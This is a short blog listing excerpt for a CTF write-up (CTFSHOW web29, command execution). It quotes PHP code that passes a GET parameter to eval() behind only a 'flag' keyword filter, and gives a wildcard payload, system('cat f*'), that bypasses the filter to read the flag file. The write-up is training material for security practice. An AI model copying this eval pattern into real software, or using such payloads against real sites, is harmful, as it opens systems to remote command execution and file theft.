2022年1月21日
CTFSHOW-WEB入门-命令执行
摘要: web29 ①考点:通配符绕过 ②关键源代码: if(isset($_GET['c'])) { $c = $_GET['c']; if(!preg_match("/flag/i", $c)) { eval($c); } } ③由于绕过了flag,直接/?c=system('cat f*');再查看源 阅读全文
posted @ 2022-01-21 13:22 Athena-ydy 阅读(966) 评论(0) 推荐(0)